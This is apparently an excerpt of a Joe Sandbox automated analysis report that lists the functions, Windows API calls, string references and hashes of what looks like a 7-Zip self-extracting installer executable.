Part of subcall function 0000000140002384: GetCurrentObject.GDI32 ref: 00000001400024CD
Part of subcall function 0000000140002384: SelectObject.GDI32 ref: 00000001400024DC
Part of subcall function 0000000140002384: SelectObject.GDI32 ref: 00000001400024E8
Part of subcall function 0000000140002384: DeleteDC.GDI32 ref: 00000001400024F1
Part of subcall function 0000000140002384: DeleteDC.GDI32 ref: 00000001400024FA
Part of subcall function 0000000140002384: ReleaseDC.USER32 ref: 0000000140002505

GetObjectW.GDI32 ref: 00000001400026BF
SetWindowPos.USER32 ref: 00000001400026E8
SendMessageW.USER32 ref: 0000000140002701
GlobalFree.KERNEL32 ref: 000000014000271C

Strings

IMAGES, xrefs: 00000001400025BC
STATIC, xrefs: 000000014000257D

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Object$Resource$CreateGlobalSelect$CompatibleWindow$DeleteFindFreeLoadStretch$AllocBitmapCapsClassCurrentDeviceHandleInitializeLockLongMenuMessageModeModuleNamePictureReleaseSendSizeofStreamlstrcmpimemcpy
String ID: IMAGES$STATIC
API String ID: 4202116410-1168396491
Opcode ID: 377b229d8a8b03171fc6d40827829fd07cc7c7df38e22e2b3b0e90d6f07125b4
Instruction ID: 4921713bf544ce7af8d8319e16cf28e62a735f36a40937c726eb1d176de2e4f6
Opcode Fuzzy Hash: 377b229d8a8b03171fc6d40827829fd07cc7c7df38e22e2b3b0e90d6f07125b4
Instruction Fuzzy Hash: E0410976209A9182EB26DBA6F4543DA63A0FBDCBC4F444426EF4E47B64DF3CC9498700

Function 0000000140001A98 Relevance: 18.3, APIs: 12, Instructions: 306COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000140001BC0

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 8520d60a68563d49259b98b8a3a9cb7977f50860d2e81ab45e98cbda63846693
Instruction ID: d5e0c1ee3c9733249a7f879758ba962592818960cb45e9e2ea0dfaba7a677a73
Opcode Fuzzy Hash: 8520d60a68563d49259b98b8a3a9cb7977f50860d2e81ab45e98cbda63846693
Instruction Fuzzy Hash: D5D11976214A8082EB61DF26E0903EEB7A1F788BD4F504022FB8A57BA5DF39C945C701

Function 000000014000A850 Relevance: 16.6, APIs: 11, Instructions: 91windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 000000014000A873
GetWindowLongPtrW.USER32 ref: 000000014000A881
DefWindowProcW.USER32 ref: 000000014000A89A
CallWindowProcW.USER32 ref: 000000014000A8BC
GetSystemMetrics.USER32 ref: 000000014000A8D1
GetSystemMetrics.USER32 ref: 000000014000A8DF
GetWindowDC.USER32 ref: 000000014000A8FD
GetWindowRect.USER32 ref: 000000014000A90E
DrawIconEx.USER32 ref: 000000014000A95D
ReleaseDC.USER32 ref: 000000014000A969

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
String ID:
API String ID: 2586545124-0
Opcode ID: 86a8894e4e7b79cb7e9e89f64b07465219e57092d9602e0fc03c3308faee4922
Instruction ID: 10aa0171647b957a33768f1cea1f4e9b956126cfc8758c1a02e2fdc5be04ff48
Opcode Fuzzy Hash: 86a8894e4e7b79cb7e9e89f64b07465219e57092d9602e0fc03c3308faee4922
Instruction Fuzzy Hash: 38318A71604A418AE711DFA7A54879AB7A1F7DEBD1F044228FF8A47B68CF3CD8458B40

Function 0000000140004E38 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 156COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000140004F5E
??3@YAXPEAX@Z.MSVCRT ref: 0000000140004FBF
wsprintfA.USER32 ref: 0000000140004FDE
wsprintfA.USER32 ref: 0000000140005012

Strings

;!@Install@!UTF-8!, xrefs: 0000000140004E7B
:Language:%u, xrefs: 0000000140005003
;!@InstallEnd@!, xrefs: 0000000140004EC9
:%hs, xrefs: 0000000140004FCF

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@wsprintf
String ID: :%hs$:Language:%u$;!@Install@!UTF-8!$;!@InstallEnd@!
API String ID: 3815514257-695273242
Opcode ID: b68de83e7609139fb20ad7cd3bfa72029f9c98ba13a05740fc13380bcd36da3a
Instruction ID: 05a19e8dbc1aa1e74f1fd7cf93fc91e611ef78269a86e53d9d91e7162cf53db0
Opcode Fuzzy Hash: b68de83e7609139fb20ad7cd3bfa72029f9c98ba13a05740fc13380bcd36da3a
Instruction Fuzzy Hash: DA61BCB2214AC486DB22DF26E4507E97B65F38CFC4F889022FB8917736CA38D956C741

Function 0000000140004738 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 124stringtimeCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140004751
GetSystemTimeAsFileTime.KERNEL32 ref: 00000001400047DF
GetFileAttributesW.KERNEL32 ref: 00000001400047E8
??3@YAXPEAX@Z.MSVCRT ref: 00000001400048C9

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

??3@YAXPEAX@Z.MSVCRT ref: 0000000140004856

Strings

:, xrefs: 0000000140004839
/, xrefs: 000000014000478D

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$FileTime$??2@AttributesSystemlstrlen
String ID: /$:
API String ID: 655742493-4222935259
Opcode ID: dd5954d8c9b333a9d136ef2743a0e17e7176797595a3f252e1a1630f843e15e8
Instruction ID: 204d4deadc9c1c9af7b1f3401057d94cdc20ba81ee9c8070c7af536f9282148a
Opcode Fuzzy Hash: dd5954d8c9b333a9d136ef2743a0e17e7176797595a3f252e1a1630f843e15e8
Instruction Fuzzy Hash: 324194E260478191FB26EF27B4453EE62A0B798BC8F04C525BB46476F7DFB8C9468344

Function 000000014000B5F0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

GetDlgItem.USER32 ref: 000000014000B656
SendMessageW.USER32 ref: 000000014000B66A
wsprintfW.USER32 ref: 000000014000B698
GetDlgItem.USER32 ref: 000000014000B6B4
SetWindowTextW.USER32 ref: 000000014000B6C5
??3@YAXPEAX@Z.MSVCRT ref: 000000014000B774

Strings

%d%%, xrefs: 000000014000B691

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@Item$??2@MessageSendTextWindowwsprintf
String ID: %d%%
API String ID: 2523864657-1518462796
Opcode ID: 022ee7b9a64e146fac015294ed00629a205f26cfd5e2d398972c04f10dfa1459
Instruction ID: 1249c9a84126987a876fe57f5b36ab08ace7640cd4c69084e92d84cb419e6ca5
Opcode Fuzzy Hash: 022ee7b9a64e146fac015294ed00629a205f26cfd5e2d398972c04f10dfa1459
Instruction Fuzzy Hash: 1D4144B6214A4082EB16EB53E4843E96361F7DCBC0F449026EB4E07BA6CF38D9448700

Function 0000000140009D74 Relevance: 12.0, APIs: 8, Instructions: 45windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32 ref: 0000000140009D92
SendMessageW.USER32 ref: 0000000140009DAB
GetDlgItem.USER32 ref: 0000000140009DBA
SendMessageW.USER32 ref: 0000000140009DCE
SendMessageW.USER32 ref: 0000000140009DE3
GetDlgItem.USER32 ref: 0000000140009DEF
SendMessageW.USER32 ref: 0000000140009E03
GetDlgItem.USER32 ref: 0000000140009E0F

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ItemMessageSend
String ID:
API String ID: 3015471070-0
Opcode ID: c4b56a63531a7fc770b72e8e47d9c50213d54845c5136c61150501375676a7ef
Instruction ID: c4a91567c9a62339a9e2cc015e6f1bd1ba8c0a46430999c3573540af0017bbf6
Opcode Fuzzy Hash: c4b56a63531a7fc770b72e8e47d9c50213d54845c5136c61150501375676a7ef
Instruction Fuzzy Hash: 0E11F339200A91CAEB55AB93F9547AA7221F7DCFD9F149038AF4E43B25CE3CD8958701

Function 000000014001D63C Relevance: 10.7, APIs: 7, Instructions: 201COMMON

Download Yara Rule

APIs

_CxxThrowException.MSVCRT ref: 000000014001D6E7
_CxxThrowException.MSVCRT ref: 000000014001D725
_CxxThrowException.MSVCRT ref: 000000014001D7FF
_CxxThrowException.MSVCRT ref: 000000014001D877
??3@YAXPEAX@Z.MSVCRT ref: 000000014001D989

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ExceptionThrow$??3@
String ID:
API String ID: 3542664073-0
Opcode ID: 231644aacb3c423078e7a94a14247a68a82b04c16bb89c5738d3aa7134bd2362
Instruction ID: d01a700a2de283df8a41960e6a11a60be9a911b58a352c6303089c7e6c0055bc
Opcode Fuzzy Hash: 231644aacb3c423078e7a94a14247a68a82b04c16bb89c5738d3aa7134bd2362
Instruction Fuzzy Hash: 12A14F32204A8496DB62EB26E4503DEB7A0F79D7C4F500116FB9D47AB6DF79C519C700

Function 000000014000552C Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

??3@YAXPEAX@Z.MSVCRT ref: 00000001400055DA
??3@YAXPEAX@Z.MSVCRT ref: 0000000140005660
??3@YAXPEAX@Z.MSVCRT ref: 000000014000568B

Strings

%%S/, xrefs: 0000000140005638
%%S, xrefs: 0000000140005665
%%S\, xrefs: 00000001400055B2

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$??2@
String ID: %%S$%%S/$%%S\
API String ID: 4113381792-1963631775
Opcode ID: 007b2b91da7e23ea7f51a79bb729fbefc66f2d4b6f3c73570940850c343cb5a8
Instruction ID: f756c1b88a9fad531d898eb76b8b724e8215e29ba3ca3f21adb70f42b67ed2c7
Opcode Fuzzy Hash: 007b2b91da7e23ea7f51a79bb729fbefc66f2d4b6f3c73570940850c343cb5a8
Instruction Fuzzy Hash: B241D972224A4482DB22DF16E4513EA6371F7D8BD9F804112FB8D476A9DF7CCA06CB50

Function 00000001400056A4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

??3@YAXPEAX@Z.MSVCRT ref: 0000000140005752
??3@YAXPEAX@Z.MSVCRT ref: 00000001400057D8
??3@YAXPEAX@Z.MSVCRT ref: 0000000140005803

Strings

%%M/, xrefs: 00000001400057B0
%%M\, xrefs: 000000014000572A
%%M, xrefs: 00000001400057DD

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$??2@
String ID: %%M$%%M/$%%M\
API String ID: 4113381792-1781175070
Opcode ID: e0b6aaf4fb19825d7c157027b3f84ef4c0cbdd7b673abe16368bc84d168324c0
Instruction ID: 70eacf09e81d2ee5294c27d3c84cffa05e7130210fc71bb2086171f2c582b56b
Opcode Fuzzy Hash: e0b6aaf4fb19825d7c157027b3f84ef4c0cbdd7b673abe16368bc84d168324c0
Instruction Fuzzy Hash: 8F41FC76224A4482DB22DF16E4513EA6371F798BD8F804112F78D47669DF7CCA06CB50

Function 00000001400053B4 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001190: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011C3
Part of subcall function 0000000140001190: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014000AEED,?,?,?,000000014000C6C2), ref: 00000001400011F8

??3@YAXPEAX@Z.MSVCRT ref: 0000000140005462
??3@YAXPEAX@Z.MSVCRT ref: 00000001400054E8
??3@YAXPEAX@Z.MSVCRT ref: 0000000140005513

Strings

%%T, xrefs: 00000001400054ED
%%T/, xrefs: 00000001400054C0
%%T\, xrefs: 000000014000543A

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ??3@$??2@
String ID: %%T$%%T/$%%T\
API String ID: 4113381792-3604420949
Opcode ID: cfd273dc6d7ca010bbfd72c8a44aeed8bc668a2ba1bbffed95ac8f77608bf74a
Instruction ID: 1f365825513f6e0002050aad4b13c09ca0367895ce49e1d5aab9d307dc0b841d
Opcode Fuzzy Hash: cfd273dc6d7ca010bbfd72c8a44aeed8bc668a2ba1bbffed95ac8f77608bf74a
Instruction Fuzzy Hash: A941FC72224A4482DB62DF12E4513EA6371F7D8BD9F804112FB8D47669DF3CCA46CB50

Function 000000014000B4B4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

Part of subcall function 000000014000AB64: GetSystemMetrics.USER32 ref: 000000014000AB93
Part of subcall function 000000014000AB64: GetSystemMetrics.USER32 ref: 000000014000AB9F
Part of subcall function 000000014000AB64: GetDlgItem.USER32 ref: 000000014000ABFF

GetSystemMetrics.USER32 ref: 000000014000B4C7
GetSystemMetrics.USER32 ref: 000000014000B4DF
GetDlgItem.USER32 ref: 000000014000B544
GetDlgItem.USER32 ref: 000000014000B5B5
??3@YAXPEAX@Z.MSVCRT ref: 000000014000B5E3

Strings

100%% , xrefs: 000000014000B507, 000000014000B579

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: MetricsSystem$Item$??3@
String ID: 100%%
API String ID: 1133332389-568723177
Opcode ID: 2c2980ac3c39602ea84bc50d8245f4954aa6ca629597dcad22d3da37a4d1cfdb
Instruction ID: 78062f72055337943d348d61c27d2a2be32fe35460fac1f231baca77d68c4b72
Opcode Fuzzy Hash: 2c2980ac3c39602ea84bc50d8245f4954aa6ca629597dcad22d3da37a4d1cfdb
Instruction Fuzzy Hash: AF414CB2600A468BEB52DF7AE44439933B1F788B99F108119FB4E472A9DF38CC45CB44

Function 000000014000B8F4 Relevance: 10.6, APIs: 7, Instructions: 54threadtimeinjectionCOMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 000000014000B910
KillTimer.USER32 ref: 000000014000B928
SetTimer.USER32 ref: 000000014000B960
SuspendThread.KERNEL32 ref: 000000014000B97E
ResumeThread.KERNEL32 ref: 000000014000B99D
TerminateThread.KERNEL32 ref: 000000014000B9B7
EndDialog.USER32 ref: 000000014000B9C3

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: Thread$DialogTimer$KillResumeSuspendTerminate
String ID:
API String ID: 815346346-0
Opcode ID: 832395ea01292b53d140b31708a0fd6863c50b6fed3c115d85d62b1df24cc5db
Instruction ID: 8af0ce400ee544ebe74d39181c7fcb3ff7c2a5a6b2e56dded6902efb854025b5
Opcode Fuzzy Hash: 832395ea01292b53d140b31708a0fd6863c50b6fed3c115d85d62b1df24cc5db
Instruction Fuzzy Hash: 4E21F971200600C2FB16DB67F9547E823A1EBDDBC5F544418EB4A07679DF39C885CB41

Function 0000000140015574 Relevance: 10.1, APIs: 8, Instructions: 97COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 00000001400155A3
memcmp.MSVCRT ref: 00000001400155CC
memcmp.MSVCRT ref: 00000001400155E2
memcmp.MSVCRT ref: 000000014001560D
memcmp.MSVCRT ref: 0000000140015629
memcmp.MSVCRT ref: 0000000140015645
memcmp.MSVCRT ref: 0000000140015661
memcmp.MSVCRT ref: 0000000140015680

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 5eec308ff3e5f41247edd94b972dd0602c8af8b31ef93064b0923f42054cba1a
Instruction ID: e3ddd6e6c3e081b2e746f117fd3f894aaa58a36aca3bed80d8eb01e15409cc88
Opcode Fuzzy Hash: 5eec308ff3e5f41247edd94b972dd0602c8af8b31ef93064b0923f42054cba1a
Instruction Fuzzy Hash: A5413BB1218B41C1FB11AF67D8503E863A6AB5DFC4F845015EF0A8F3AAEF35CA058344

Function 000000014000EA80 Relevance: 9.2, APIs: 5, Strings: 1, Instructions: 240COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000014000EC6A
memset.MSVCRT ref: 000000014000EC7F

Part of subcall function 000000014000DF80: memset.MSVCRT ref: 000000014000DF9D
Part of subcall function 000000014000DF80: memset.MSVCRT ref: 000000014000E08B

memset.MSVCRT ref: 000000014000EDF8
memcpy.MSVCRT ref: 000000014000EE30
memcpy.MSVCRT ref: 000000014000EE4C

Strings

MZ`, xrefs: 000000014000EA99

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: memset$memcpy
String ID: MZ`
API String ID: 368790112-2330268423
Opcode ID: 5d30ba0483c92e9cacd345f037355ad7bb9e39ae956c386603695625c66f6f0a
Instruction ID: 8dc85a1fb84167b2412f383916e119258885706ac79a51b604a51d09ec214bd9
Opcode Fuzzy Hash: 5d30ba0483c92e9cacd345f037355ad7bb9e39ae956c386603695625c66f6f0a
Instruction Fuzzy Hash: F7B1B4727047C0A7EB69CB22F5543EE77A0F389384F40012AEB8957A92DB39E475CB10

Function 000000014001BD8C Relevance: 9.2, APIs: 6, Instructions: 219COMMON

Download Yara Rule

APIs

Part of subcall function 000000014001A67C: _CxxThrowException.MSVCRT ref: 000000014001A69F

Part of subcall function 0000000140014DD8: _CxxThrowException.MSVCRT ref: 0000000140014E10
Part of subcall function 0000000140014DD8: _CxxThrowException.MSVCRT ref: 0000000140014E40
Part of subcall function 0000000140014DD8: ??2@YAPEAX_K@Z.MSVCRT(?,?,?,?,0000000140014F39,?,?,?,?,000000014000467A), ref: 0000000140014E50
Part of subcall function 0000000140014DD8: _CxxThrowException.MSVCRT ref: 0000000140014E71
Part of subcall function 0000000140014DD8: memcpy.MSVCRT ref: 0000000140014E8F
Part of subcall function 0000000140014DD8: ??3@YAXPEAX@Z.MSVCRT(?,?,?,?,0000000140014F39,?,?,?,?,000000014000467A), ref: 0000000140014E98

??2@YAPEAX_K@Z.MSVCRT ref: 000000014001BDF6
??3@YAXPEAX@Z.MSVCRT ref: 000000014001BE34

Part of subcall function 000000014001BB1C: ??3@YAXPEAX@Z.MSVCRT(?,?,?,000000014001BD46), ref: 000000014001BB4E
Part of subcall function 000000014001BB1C: memcpy.MSVCRT ref: 000000014001BB7B

_CxxThrowException.MSVCRT ref: 000000014001BFB2
_CxxThrowException.MSVCRT ref: 000000014001BFD0
_CxxThrowException.MSVCRT ref: 000000014001BFEE
_CxxThrowException.MSVCRT ref: 000000014001C071

Memory Dump Source

Source File: 00000007.00000002.2480156684.0000000140001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2480134793.0000000140000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480292330.0000000140021000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480315580.0000000140027000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2480346113.000000014002B000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_89ED.jbxd

Similarity

API ID: ExceptionThrow$??3@$??2@memcpy
String ID:
API String ID: 4165819386-0
Opcode ID: 4acece95a5e8ebec4167dd6fc381e80c5bb31d4482c290026559e9632fb447d9
Instruction ID: a7e2a8e14197d125a092fd650603ed9034885d35ec5d2ba7903c9d65a4cec536
Opcode Fuzzy Hash: 4acece95a5e8ebec4167dd6fc381e80c5bb31d4482c290026559e9632fb447d9
Instruction Fuzzy Hash: 4591C07220078496EB22DB66D4847EE77A0F78D7D4F440126FB8E4BBA6DB3AC415CB00

Function 000000014001AE5C Relevance: 9.1, APIs: 6, Instructions: 143COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT(00000000,?,?,000000014001B0C2), ref: 000000014001AEF1
??3@YAXPEAX@Z.MSVCRT(00000000,?,?,000000014001B0C2), ref: 000000014001AEFB
memcpy.MSVCRT ref: 000000014001AF0D
memcpy.MSVCRT ref: 000000014001AFDE
memcpy.MSVCRT ref: 000000014001B003
